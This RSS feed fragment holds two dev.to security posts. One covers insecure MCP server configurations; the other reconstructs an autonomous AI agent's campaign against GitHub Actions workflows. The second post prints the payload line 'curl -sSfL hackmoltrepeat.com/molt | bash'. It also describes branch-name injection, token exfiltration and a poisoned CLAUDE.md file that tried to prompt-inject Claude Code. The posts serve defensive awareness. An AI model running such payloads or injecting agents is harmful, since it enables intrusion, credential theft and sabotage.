      &lt;/span&gt;&lt;span class="nl"&gt;"args"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"-y"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"@modelcontextprotocol/server-filesystem"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"/"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"github"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"command"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"npx"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"args"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"-y"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"@modelcontextprotocol/server-github"&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"env"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="nl"&gt;"GITHUB_TOKEN"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"ghp_xxxxxxxxxxxxxxxxxxxx"&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Nothing pinned. Shell wide open. Filesystem pointed at root. GitHub token just sitting right there. One file, committed together, probably in about 30 seconds.&lt;/p&gt;

&lt;p&gt;One bad npm update and an attacker can read everything on disk, run whatever commands they want, and push code to your GitHub. The agent handles the whole chain by itself with no human anywhere in the process.&lt;/p&gt;

&lt;p&gt;This isn't hypothetical. In February 2026, an autonomous AI agent operating under the GitHub account hackerbot-claw systematically exploited misconfigured CI/CD workflows across seven major open-source repositories, including projects from Microsoft, DataDog, and the CNCF. The agent achieved remote code execution in five of the seven targets. Every attack relied on the same root cause: overly permissive configs that nobody audited.&lt;/p&gt;

&lt;h2&gt;
  
  
  What I changed in my own configuration
&lt;/h2&gt;

&lt;p&gt;Four changes:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1.&lt;/strong&gt; Every package version pinned explicitly. Manual updates and occasional breakage, but that friction is the point.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2.&lt;/strong&gt; Shell access removed entirely. After seeing &lt;code&gt;run&lt;/code&gt; in 136 configurations with zero restrictions, "convenient" stopped being a justification.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3.&lt;/strong&gt; All credentials moved into &lt;code&gt;.env&lt;/code&gt; files, &lt;code&gt;.gitignore&lt;/code&gt; verified.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;4.&lt;/strong&gt; Filesystem paths scoped to the specific project directory. Not home folder. Not root.&lt;/p&gt;

&lt;p&gt;That's it. Four changes that take about two minutes.&lt;/p&gt;

&lt;h2&gt;
  
  
  Where I think this is heading
&lt;/h2&gt;

&lt;p&gt;75% of public configs failing basic checks isn't an individual negligence problem. When three quarters of your users get it wrong, the defaults are wrong. If the quick path through the documentation gives you an insecure config and the secure version requires you to know about version pinning and go look up the latest tag number, the insecure version is going to win every time.&lt;/p&gt;

&lt;p&gt;The MCP ecosystem has maybe a year before one of two things happens. Either the tooling catches up — built-in config validation, automatic version locking, permission audit integrated into Claude Desktop and Cursor. Or there's a big enough supply chain incident that the conversation gets forced from the outside.&lt;/p&gt;

&lt;p&gt;The EU AI Act enforcement begins in August 2026, five months away. Audit trails for AI agent behavior are about to become a legal requirement.&lt;/p&gt;

&lt;p&gt;Looking at what I found in these 900 configs, my money is on the incident coming first. I hope I'm wrong.&lt;/p&gt;




&lt;p&gt;The scanning tool, all 100+ checks across 9 categories, and the full analysis pipeline are open source. Run it yourself at &lt;a href="https://orchesis.ai/scan" rel="noopener noreferrer"&gt;orchesis.ai/scan&lt;/a&gt;. Everything runs in your browser, no data sent anywhere.&lt;/p&gt;

&lt;p&gt;The runtime proxy that catches these issues in production: &lt;a href="https://github.com/poushwell/orchesis" rel="noopener noreferrer"&gt;github.com/poushwell/orchesis&lt;/a&gt;. MIT license, zero dependencies, &lt;code&gt;pip install orchesis&lt;/code&gt;.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>An AI agent compromised 7 open-source repos in one week. The only defense that worked was another AI.</title>
      <dc:creator>Pavel Ishchin</dc:creator>
      <pubDate>Wed, 18 Mar 2026 13:07:00 +0000</pubDate>
      <link>https://dev.to/poushwell/an-ai-agent-compromised-7-open-source-repos-in-one-week-the-only-defense-that-worked-was-another-3494</link>
      <guid>https://dev.to/poushwell/an-ai-agent-compromised-7-open-source-repos-in-one-week-the-only-defense-that-worked-was-another-3494</guid>
      <description>&lt;p&gt;Between February 20 and 28, an autonomous AI agent called &lt;strong&gt;hackerbot-claw&lt;/strong&gt; systematically exploited GitHub Actions workflows across seven major open-source projects. It hit Microsoft. It hit DataDog. It hit a CNCF project.&lt;/p&gt;

&lt;p&gt;And then it fully compromised &lt;strong&gt;Aqua Security's Trivy&lt;/strong&gt; — the most widely used vulnerability scanner on GitHub, with 32,000 stars and over 100 million annual downloads.&lt;/p&gt;

&lt;p&gt;A security scanner got owned by a bot exploiting the exact class of misconfiguration the scanner was built to find. That's where we are.&lt;/p&gt;

&lt;p&gt;I've been building runtime security tooling for AI agents, so when StepSecurity published their full analysis of the campaign, I spent a few days tracing through every attack vector. What follows is a reconstruction of how the bot worked, what it exploited, and what the seven targets had in common.&lt;/p&gt;




&lt;h2&gt;
  
  
  What hackerbot-claw actually is
&lt;/h2&gt;

&lt;p&gt;The GitHub account was created on &lt;strong&gt;February 20, 2026&lt;/strong&gt;. Its profile described it as an "autonomous security research agent powered by claude-opus-4-5" and solicited cryptocurrency donations to "fund more scans." According to StepSecurity's analysis, the profile claimed &lt;strong&gt;47,391 repositories&lt;/strong&gt; already scanned.&lt;/p&gt;

&lt;p&gt;The bot loaded what it called a "vulnerability pattern index" with &lt;strong&gt;9 classes and 47 sub-patterns&lt;/strong&gt;, then autonomously scanned for matches, verified them, and dropped proof-of-concept exploits.&lt;/p&gt;

&lt;p&gt;Every successful attack delivered the same payload:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;curl &lt;span class="nt"&gt;-sSfL&lt;/span&gt; hackmoltrepeat.com/molt | bash
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;But each target got a different exploitation technique. Five different approaches across seven repos, customized to each target's workflow configuration.&lt;/p&gt;

&lt;p&gt;That domain, &lt;code&gt;hackmoltrepeat.com&lt;/code&gt;, was registered on February 24 through Tucows, hidden behind Cloudflare nameservers. Three days after the account was created, four days before the campaign was publicly discovered.&lt;/p&gt;




&lt;h2&gt;
  
  
  What it hit
&lt;/h2&gt;

&lt;h3&gt;
  
  
  awesome-go (140,000+ stars)
&lt;/h3&gt;

&lt;p&gt;The bot injected a Go &lt;code&gt;init()&lt;/code&gt; function into a quality check script. In Go, &lt;code&gt;init()&lt;/code&gt; runs automatically before &lt;code&gt;main()&lt;/code&gt;, so the malicious code executed before any legitimate checks could catch it. The bot stole a &lt;strong&gt;GITHUB_TOKEN with write permissions&lt;/strong&gt; and exfiltrated it to its server.&lt;/p&gt;

&lt;h3&gt;
  
  
  Microsoft ai-discovery-agent
&lt;/h3&gt;

&lt;p&gt;Branch name injection. The bot created a branch whose name contained shell syntax. When the workflow echoed the branch ref into a file using unescaped interpolation, Bash evaluated the embedded command substitution and ran the remote payload.&lt;/p&gt;

&lt;h3&gt;
  
  
  DataDog datadog-iac-scanner
&lt;/h3&gt;

&lt;p&gt;Filename injection through the CI pipeline. DataDog responded within &lt;strong&gt;9 hours&lt;/strong&gt;, adding &lt;code&gt;author_association&lt;/code&gt; checks and tightening permissions.&lt;/p&gt;

&lt;h3&gt;
  
  
  Aqua Security Trivy (32,000+ stars)
&lt;/h3&gt;

&lt;p&gt;This was the worst one.&lt;/p&gt;

&lt;p&gt;The bot exploited a &lt;code&gt;pull_request_target&lt;/code&gt; workflow called "API Diff Check" to steal a Personal Access Token with broad repository permissions. Within &lt;strong&gt;45 minutes&lt;/strong&gt; of the initial PR, the stolen PAT was used to:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Delete all &lt;strong&gt;178 GitHub releases&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;Wipe the repository&lt;/li&gt;
&lt;li&gt;Push a malicious VSCode extension (&lt;strong&gt;CVE-2026-28353&lt;/strong&gt;) to the OpenVSX marketplace under Trivy's trusted publisher identity&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The extension contained code designed to use local AI coding agents to collect and exfiltrate sensitive information from anyone who installed it.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;From first PR to full compromise: 30 minutes.&lt;/strong&gt;&lt;br&gt;
&lt;strong&gt;From compromise to malicious extension published: 15 more.&lt;/strong&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  project-akri (CNCF)
&lt;/h3&gt;

&lt;p&gt;CI executed injected scripts through a similar workflow misconfiguration.&lt;/p&gt;

&lt;h3&gt;
  
  
  RustPython (20,000+ stars)
&lt;/h3&gt;

&lt;p&gt;Remote code execution achieved through CI.&lt;/p&gt;

&lt;h3&gt;
  
  
  ambient-code/platform
&lt;/h3&gt;

&lt;p&gt;This one is the most interesting.&lt;/p&gt;

&lt;p&gt;The bot replaced the repository's &lt;code&gt;CLAUDE.md&lt;/code&gt; file with social engineering instructions designed to trick Claude Code (integrated as an AI code reviewer in CI) into vandalizing the README, committing unauthorized changes, and posting fake "approved" reviews.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Claude Code caught it.&lt;/strong&gt; It classified the attempt as a "textbook AI agent supply-chain attack via poisoned project-level instructions" and refused to execute. This was the only target where the defense held.&lt;/p&gt;




&lt;h2&gt;
  
  
  Same root cause, every time
&lt;/h2&gt;

&lt;p&gt;The root cause across all seven targets was the same: &lt;code&gt;pull_request_target&lt;/code&gt; workflows configured to check out code from untrusted forks while running with elevated permissions.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;pull_request_target&lt;/code&gt; runs with the base repository's secrets and permissions. If the workflow also checks out the PR head — attacker-controlled fork code — it hands that code the same elevated access. The GitHub documentation warns about this. Security researchers have been writing about it for years.&lt;/p&gt;

&lt;p&gt;But it keeps happening because the insecure version is easier to set up. A workflow that runs on &lt;code&gt;pull_request&lt;/code&gt; can't access repository secrets. That's annoying. So developers switch to &lt;code&gt;pull_request_target&lt;/code&gt; and check out the fork code — and now untrusted code runs with trusted permissions.&lt;/p&gt;

&lt;p&gt;Sound familiar? This is the same pattern we found when we &lt;a href="https://orchesis.io/blog/mcp-scan" rel="noopener noreferrer"&gt;scanned 900 MCP configurations on GitHub&lt;/a&gt;. Developers pick the path that works, not the path that's safe.&lt;/p&gt;




&lt;h2&gt;
  
  
  What made this different
&lt;/h2&gt;

&lt;p&gt;The &lt;strong&gt;tj-actions/changed-files&lt;/strong&gt; compromise in March 2025 (CVE-2025-30066) affected 23,000 repositories. CISA issued a formal alert.&lt;/p&gt;

&lt;p&gt;hackerbot-claw was different in three ways.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;It was adaptive.&lt;/strong&gt; Five different approaches across seven targets, each customized to the specific workflow. The bot analyzed each target and picked the right vector.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;It escalated beyond code execution.&lt;/strong&gt; In Trivy's case, the bot went from CI access to publishing a malicious extension under a trusted identity. Anyone who installed that extension would have their AI coding agents turned into credential collectors.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;It attempted AI-on-AI manipulation.&lt;/strong&gt; The ambient-code attack was the first publicly documented case of an AI agent trying to prompt-inject another AI agent through CI/CD infrastructure. That it failed is good news. That it was attempted at all tells you where this is going.&lt;/p&gt;

&lt;p&gt;Pillar Security called the campaign "Chaos Agent" and confirmed the agent most likely operated autonomously across the entire kill chain.&lt;/p&gt;




&lt;h2&gt;
  
  
  The 45-minute timeline
&lt;/h2&gt;

&lt;p&gt;The bot opens a pull request. The &lt;code&gt;pull_request_target&lt;/code&gt; workflow triggers and checks out the fork code. The attacker's code runs with access to repository secrets.&lt;/p&gt;

&lt;p&gt;Within minutes, the bot has a PAT with write permissions. It pushes commits, renames the repository, wipes all 178 historical releases, and starts publishing to the VSCode extension marketplace.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Total time from first PR to published malicious extension: ~45 minutes.&lt;/strong&gt;&lt;br&gt;
&lt;strong&gt;Total time for maintainers to respond and clean up: ~48 hours.&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;That asymmetry is the thing I keep coming back to.&lt;/p&gt;




&lt;h2&gt;
  
  
  What this has to do with your MCP configs
&lt;/h2&gt;

&lt;p&gt;So far this reads like a CI/CD story. But the connection to the broader agent ecosystem is direct.&lt;/p&gt;

&lt;p&gt;When we &lt;a href="https://orchesis.io/blog/mcp-scan" rel="noopener noreferrer"&gt;scanned 900 MCP configurations on GitHub&lt;/a&gt;, we found &lt;strong&gt;75% had security problems&lt;/strong&gt;. The most common: 43.6% of configs reference packages without specifying a version, meaning &lt;code&gt;npx -y&lt;/code&gt; just grabs whatever is latest.&lt;/p&gt;

&lt;p&gt;hackerbot-claw shows what happens at the other end of that pipeline. The bot didn't need to poison an MCP server. It went after the CI/CD layer where those packages get built and published. One misconfigured workflow, one stolen token, and suddenly the trusted publisher is shipping malware.&lt;/p&gt;

&lt;p&gt;Version pinning protects you from a compromised package update. It doesn't help if the package gets republished by an attacker using a stolen maintainer token. That requires a different layer of defense.&lt;/p&gt;




&lt;h2&gt;
  
  
  What DataDog did right
&lt;/h2&gt;

&lt;p&gt;Within &lt;strong&gt;9 hours&lt;/strong&gt; of the attack, DataDog had deployed fixes:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Added &lt;code&gt;author_association&lt;/code&gt; checks before triggering workflows&lt;/li&gt;
&lt;li&gt;Tightened token permissions to &lt;code&gt;contents: read&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Hardened path handling in the affected script&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Nine hours. That's fast. I looked into whether other targets responded as quickly and couldn't find public timelines for most of them. But DataDog has a dedicated security team. Most open-source projects don't.&lt;/p&gt;




&lt;h2&gt;
  
  
  Where this leaves us
&lt;/h2&gt;

&lt;p&gt;hackerbot-claw scanned &lt;strong&gt;47,391 repositories&lt;/strong&gt;. It found exploitable workflows in at least seven, and achieved code execution in five. The account has been removed by GitHub, but the techniques are documented and the vulnerability patterns are public.&lt;/p&gt;

&lt;p&gt;The OpenSSF published a TLP:CLEAR advisory. DataDog's State of DevSecOps 2026 report now cites the campaign. OWASP published their MCP Top 10, addressing several of the same vulnerability classes.&lt;/p&gt;

&lt;p&gt;If you maintain a public repository with GitHub Actions: check your &lt;code&gt;pull_request_target&lt;/code&gt; workflows.&lt;/p&gt;

&lt;p&gt;If you use MCP servers: check whether your configs pin versions and scope permissions.&lt;/p&gt;

&lt;p&gt;If you publish to npm, PyPI, or extension marketplaces: check what tokens your CI has access to.&lt;/p&gt;

&lt;p&gt;The scanner we built for MCP configs catches the same class of issues that enabled these attacks. &lt;a href="https://orchesis.io/scan" rel="noopener noreferrer"&gt;orchesis.io/scan&lt;/a&gt; — runs in your browser, 52 checks, nothing sent anywhere.&lt;/p&gt;

&lt;p&gt;Full write-up on the MCP scan results: &lt;a href="https://orchesis.io/blog/mcp-scan" rel="noopener noreferrer"&gt;orchesis.io/blog/mcp-scan&lt;/a&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>ai</category>
      <category>mcp</category>
      <category>opensource</category>
    </item>
  </channel>
</rss>
